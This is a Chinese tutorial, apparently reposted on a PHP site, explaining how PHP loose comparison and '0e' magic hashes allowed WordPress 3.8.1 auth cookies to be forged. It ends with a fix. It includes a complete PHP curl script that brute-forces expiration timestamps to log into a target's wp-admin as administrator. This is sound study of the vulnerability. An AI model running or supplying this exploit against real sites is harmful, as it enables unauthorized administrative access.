Home > Backend Development > PHP Tutorial > PHP弱类型:WordPress Cookie仿冒

PHP弱类型:WordPress Cookie仿冒

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
Release: 2016-06-13 12:23:41
Original
1073 people have browsed it

PHP弱类型:WordPress Cookie伪造

1 PHP弱类型

  PHP是弱类型语言,所以变量会因为使用场景的不同自动进行类型转换。PHP中用 == 以及 != 进行相等判断时,会自动进行类型转换,用 === 以及 !== 进行判断时不会自动转换类型。

<span style="color: #008080;">1</span> <span style="color: #000000;">php</span><span style="color: #008080;">2</span>     <span style="color: #800080;">$a</span> = 3<span style="color: #000000;">;</span><span style="color: #008080;">3</span>     <span style="color: #800080;">$b</span> = '3vic'<span style="color: #000000;">;</span><span style="color: #008080;">4</span>     <span style="color: #008080;">var_dump</span>(<span style="color: #800080;">$a</span> == <span style="color: #800080;">$b</span>);<span style="color: #008000;">//</span><span style="color: #008000;">true</span><span style="color: #008080;">5</span>     <span style="color: #008080;">var_dump</span>(<span style="color: #800080;">$a</span> != <span style="color: #800080;">$b</span>);<span style="color: #008000;">//</span><span style="color: #008000;">false</span><span style="color: #008080;">6</span>     <span style="color: #008080;">var_dump</span>(<span style="color: #800080;">$a</span> === <span style="color: #800080;">$b</span>);<span style="color: #008000;">//</span><span style="color: #008000;">true</span><span style="color: #008080;">7</span>     <span style="color: #008080;">var_dump</span>(<span style="color: #800080;">$a</span> !== <span style="color: #800080;">$b</span>);<span style="color: #008000;">//</span><span style="color: #008000;">false</span><span style="color: #008080;">8</span> ?>
Copy after login

 说明:在PHP中字符串转换成整型时,如果是数字开头就会转换成前面的数字('3vic' -> 3),如果不是数字开头,那么就会转换成0('vic' -> 0)

2 WordPress代码

  • WordPress 3.8.1 WordPress 3.8.2 部分代码区别
<span style="color: #008080;">1</span> <span style="color: #000000;">php</span><span style="color: #008080;">2</span>     <span style="color: #008000;">//</span><span style="color: #008000;"> WordPress 3.8.1</span><span style="color: #008080;">3</span>     <span style="color: #0000ff;">if</span> (<span style="color: #800080;">$hmac</span> != <span style="color: #800080;">$hash</span><span style="color: #000000;">) {}</span><span style="color: #008080;">4</span>     <span style="color: #008000;">//</span><span style="color: #008000;"> WordPress 3.8.2</span><span style="color: #008080;">5</span>     <span style="color: #0000ff;">if</span> ( hash_hmac('md5', <span style="color: #800080;">$hmac</span>, <span style="color: #800080;">$key</span>) !== hash_hmac('md5', <span style="color: #800080;">$hash</span>, <span style="color: #800080;">$key</span><span style="color: #000000;">) )  {}</span><span style="color: #008080;">6</span> ?>
Copy after login
  • Cookie 组成

  客户端后台只验证其中的一条Cookie,如下所示

wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin|<span style="color: #ff0000;">1433403595</span>|cf50f3b50eed94dd0fdc3d3ea2c7bbb; path=/wp-admin; domain=www.test.ichunqiu; HttpOnly
Copy after login

  其中Cookie名 wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91 格式为 wordpress_ + md5(siteurl)  其中siteurl为WordPress的网址,此处网站地址为<span style="color: #ff0000;">http://www.test.ichunqiu</span>,md5加密后为<span style="color: #ff0000;">c47f4a97d0321c1980bb76fc00d1e78f</span>,其它部分也可省。

类型      用户名     过期时间        登录成功服务器端赋予客户端的hash值

对应变量 $username $expiration $hmac
cookies admin 1433403595 cf50f3b50eed94dd0fdc3d3ea2c7bbb

 

 

 

  • 分析验证登录

  代码 wp-includes/pluggable.php 第543-549行

<span style="color: #008080;">1</span> <span style="color: #000000;">php</span><span style="color: #008080;">2</span>     <span style="color: #800080;">$key</span> = wp_hash(<span style="color: #800080;">$username</span> . <span style="color: #800080;">$pass_frag</span> . '|' . <span style="color: #800080;">$expiration</span>, <span style="color: #800080;">$scheme</span><span style="color: #000000;">);</span><span style="color: #008080;">3</span>     <span style="color: #800080;">$hash</span> = hash_hmac('md5', <span style="color: #800080;">$username</span> . '|' . <span style="color: #800080;">$expiration</span>, <span style="color: #800080;">$key</span><span style="color: #000000;">);</span><span style="color: #008080;">4</span>     <span style="color: #0000ff;">if</span> ( <span style="color: #800080;">$hmac</span> != <span style="color: #800080;">$hash</span><span style="color: #000000;"> ) {</span><span style="color: #008080;">5</span>     do_action('auth_cookie_bad_hash', <span style="color: #800080;">$cookie_elements</span><span style="color: #000000;">);</span><span style="color: #008080;">6</span>     <span style="color: #0000ff;">return</span> <span style="color: #0000ff;">false</span><span style="color: #000000;">;</span><span style="color: #008080;">7</span> }
Copy after login

  在代码所使用的变量中,通过改变客户端Cookie 的方式可控的有 $username 用户名,$expiration 有效期,又因为其中用户名是固定的,因此只有$expiration是可控的,所以我们可以从改变 <span style="color: #ff0000;">$expiration </span>的方法来改变$hash

  • 结合PHP Hash 比较缺陷分析 WordPress

  有以下几种可能使 $hmac == $hash 为真,字符串完全相等或者 $hmac 等于0的同时 <span style="color: #ff0000;">$hash</span> 为以字符开头的字符串; 将客户端的Cookie中 $hmac 值改为0,然后在if ( $hmac != $hash ) {的上面一行写入<span style="color: #ff0000;">var_dump($hmac);die()</span>;发现打印出来 $hmac 的结果是 string '0'而不是int 0, 那么有没有方法使字符串识别为整数呢,代码如下:

<span style="color: #008080;">1</span> <span style="color: #000000;">php</span><span style="color: #008080;">2</span> <span style="color: #008080;">var_dump</span>('0' == '0e156464513131');<span style="color: #008000;">//</span><span style="color: #008000;">true</span>
Copy after login

  其中的 0e156464513131 会被识别为0乘以10的156464513131次方,还是得0;因此当 $hash 以0e开头后面全是数字时就会与 <span style="color: #ff0000;">$hmac</span> 的值为 '0' 时相等,所以我们可以将客户端的Cookie设置为类似 wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin|1433403595|0 然后不断更新过期时间(现在1433403595的位置)的方法来碰撞服务器端,一旦 $hash 的值为0e开头后面全是数字即可验证通过。假设碰撞成功,就修改浏览器的Cookie,直接访问后台地址,就可以成功登陆后台。

3 测试脚本

  通过改变客户端Cookie里过期时间的值,不断尝试登录后台,找出可以进入后台的时间戳,从而实现Cookie伪造登录后台。

<span style="color: #008080;"> 1</span> <span style="color: #000000;">php</span><span style="color: #008080;"> 2</span> <span style="color: #008000;">/*</span><span style="color: #008080;"> 3</span> <span style="color: #008080;"> 4</span> <span style="color: #008000;">本脚本用于WordPress 3.8.1 的cookie伪造漏洞检测</span><span style="color: #008080;"> 5</span> <span style="color: #008000;">传入两个值</span><span style="color: #008080;"> 6</span> <span style="color: #008000;">  WordPress 的主页 $host</span><span style="color: #008080;"> 7</span> <span style="color: #008000;">  管理员用户名     $root</span><span style="color: #008080;"> 8</span> <span style="color: #008000;">*/</span><span style="color: #008080;"> 9</span>     <span style="color: #008080;">header</span>("Content-type:text/html;charset=utf-8"<span style="color: #000000;">);</span><span style="color: #008080;">10</span> <span style="color: #008080;">11</span>     <span style="color: #800080;">$host</span> = 'http://xxx.xxx.xxx';<span style="color: #008000;">//</span><span style="color: #008000;">主页地址 结尾不带'/'</span><span style="color: #008080;">12</span>     <span style="color: #800080;">$root</span> = 'user';<span style="color: #008000;">//</span><span style="color: #008000;">管理员用户名</span><span style="color: #008080;">13</span> <span style="color: #008080;">14</span>     <span style="color: #800080;">$url</span> = <span style="color: #800080;">$host</span>.'/wp-admin/';<span style="color: #008000;">//</span><span style="color: #008000;">后台管理地址    </span><span style="color: #008080;">15</span>     <span style="color: #800080;">$sitehash</span>=<span style="color: #008080;">md5</span>(<span style="color: #800080;">$host</span><span style="color: #000000;">); </span><span style="color: #008080;">16</span> <span style="color: #008080;">17</span>     <span style="color: #0000ff;">echo</span> "\nWelcome\n\n"<span style="color: #000000;">;</span><span style="color: #008080;">18</span>     <span style="color: #008000;">//</span><span style="color: #008000;">通过时间戳暴力破解cookie 实现伪造cookie</span><span style="color: #008080;">19</span>     <span style="color: #0000ff;">for</span>(<span style="color: #800080;">$i</span>=1500000000;<span style="color: #800080;">$i</span>$i++<span style="color: #000000;">){</span><span style="color: #008080;">20</span>         <span style="color: #800080;">$cookie</span> = "wordpress_".<span style="color: #800080;">$sitehash</span>."=".<span style="color: #800080;">$root</span>."|".<span style="color: #800080;">$i</span>."|0;";<span style="color: #008000;">//</span><span style="color: #008000;">组合构造cookie</span><span style="color: #008080;">21</span>         <span style="color: #800080;">$header</span> = <span style="color: #0000ff;">array</span><span style="color: #000000;">(</span><span style="color: #008080;">22</span>        "Content-Type:application/x-www-form-urlencoded",<span style="color: #008080;">23</span>       'User-Agent: Mozilla/4.0 (compatible; MSIE .0; Windows NT 6.1; Trident/4.0; SLCC2;)',<span style="color: #008080;">24</span>       "Cookie:".<span style="color: #800080;">$cookie</span>,<span style="color: #008080;">25</span> <span style="color: #000000;">      );</span><span style="color: #008080;">26</span> <span style="color: #008080;">27</span>         <span style="color: #800080;">$curl</span> = curl_init(); <span style="color: #008000;">//</span><span style="color: #008000;"> 启动一个CURL会话    </span><span style="color: #008080;">28</span>         curl_setopt(<span style="color: #800080;">$curl</span>, CURLOPT_URL, <span style="color: #800080;">$url</span>); <span style="color: #008000;">//</span><span style="color: #008000;"> 要访问的地址</span><span style="color: #008080;">29</span>         curl_setopt(<span style="color: #800080;">$curl</span>, CURLOPT_FOLLOWLOCATION, 1); <span style="color: #008000;">//</span><span style="color: #008000;"> 使用自动跳转    </span><span style="color: #008080;">30</span>         curl_setopt(<span style="color: #800080;">$curl</span>, CURLOPT_AUTOREFERER, 1); <span style="color: #008000;">//</span><span style="color: #008000;"> 自动设置Referer    </span><span style="color: #008080;">31</span>         curl_setopt(<span style="color: #800080;">$curl</span>, CURLOPT_HTTPGET, <span style="color: #0000ff;">true</span>); <span style="color: #008000;">//</span><span style="color: #008000;"> 发送一个常规的Post请求    </span><span style="color: #008080;">32</span>         curl_setopt(<span style="color: #800080;">$curl</span>, CURLOPT_HTTPHEADER, <span style="color: #800080;">$header</span>); <span style="color: #008000;">//</span><span style="color: #008000;"> 读取上面所储存的Cookie信息         </span><span style="color: #008080;">33</span>         curl_setopt(<span style="color: #800080;">$curl</span>, CURLOPT_RETURNTRANSFER, 1); <span style="color: #008000;">//</span><span style="color: #008000;"> 获取的信息以文件流的形式返回 </span><span style="color: #008080;">34</span>         curl_setopt(<span style="color: #800080;">$curl</span>, CURLOPT_HEADER, <span style="color: #0000ff;">false</span><span style="color: #000000;">);</span><span style="color: #008080;">35</span>         curl_setopt(<span style="color: #800080;">$curl</span>, CURLOPT_HEADER, 0<span style="color: #000000;">);   </span><span style="color: #008080;">36</span>         curl_setopt(<span style="color: #800080;">$curl</span>, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);<span style="color: #008000;">//</span><span style="color: #008000;">让curl自动选择版本</span><span style="color: #008080;">37</span>         <span style="color: #800080;">$tmpInfo</span> = curl_exec(<span style="color: #800080;">$curl</span>); <span style="color: #008000;">//</span><span style="color: #008000;"> 执行操作</span><span style="color: #008080;">38</span>         <span style="color: #0000ff;">if</span> (curl_errno(<span style="color: #800080;">$curl</span><span style="color: #000000;">)) {    </span><span style="color: #008080;">39</span>         <span style="color: #0000ff;">echo</span> 'Errno'.curl_error(<span style="color: #800080;">$curl</span><span style="color: #000000;">);    </span><span style="color: #008080;">40</span> <span style="color: #000000;">        }    </span><span style="color: #008080;">41</span>         curl_close(<span style="color: #800080;">$curl</span>); <span style="color: #008000;">//</span><span style="color: #008000;"> 关闭CURL会话</span><span style="color: #008080;">42</span> <span style="color: #008080;">43</span> <span style="color: #008000;">        //匹配结果</span><span style="color: #008080;">44</span>         <span style="color: #0000ff;">if</span>(<span style="color: #008080;">strstr</span>(<span style="color: #800080;">$tmpInfo</span>,'我们准备了几个链接供您开始'<span style="color: #000000;">)){</span><span style="color: #008080;">45</span>             <span style="color: #0000ff;">echo</span>  "\n".'success : '.<span style="color: #800080;">$cookie</span>."\n\n"<span style="color: #000000;">;</span><span style="color: #008080;">46</span>             <span style="color: #0000ff;">break</span><span style="color: #000000;">;</span><span style="color: #008080;">47</span>         }<span style="color: #0000ff;">else</span><span style="color: #000000;">{</span><span style="color: #008080;">48</span>             <span style="color: #0000ff;">echo</span>  'fail : '.<span style="color: #800080;">$cookie</span>."\n"<span style="color: #000000;">;</span><span style="color: #008080;">49</span> <span style="color: #000000;">        }</span><span style="color: #008080;">50</span> <span style="color: #008080;">51</span> <span style="color: #000000;">    }</span><span style="color: #008080;">52</span> ?>    
Copy after login

  说明理论上32位的MD5值以0e开头的大概三亿分之一,碰撞到可以利用的 <span style="color: #ff0000;">$expiration </span>几率极低

5 修复方案

  PHP 中使用的哈希比较函数,将其中的 ==!= 分别更改为 ===!== 或者 将比较的两个变量使用MD5再加密一次。

学习笔记:http://ichunqiu.com/course/167

Related labels:
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Latest Issues
curl simulated login
From 1970-01-01 08:00:00
0
0
0
How to set boolean value true in php curl
From 1970-01-01 08:00:00
0
0
0
Please tell me, php curl request page shows blank
From 1970-01-01 08:00:00
0
0
0
The difference between curl in php5.3 and php5.5
From 1970-01-01 08:00:00
0
0
0
php - curl, http request returns json truncated
From 1970-01-01 08:00:00
0
0
0
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template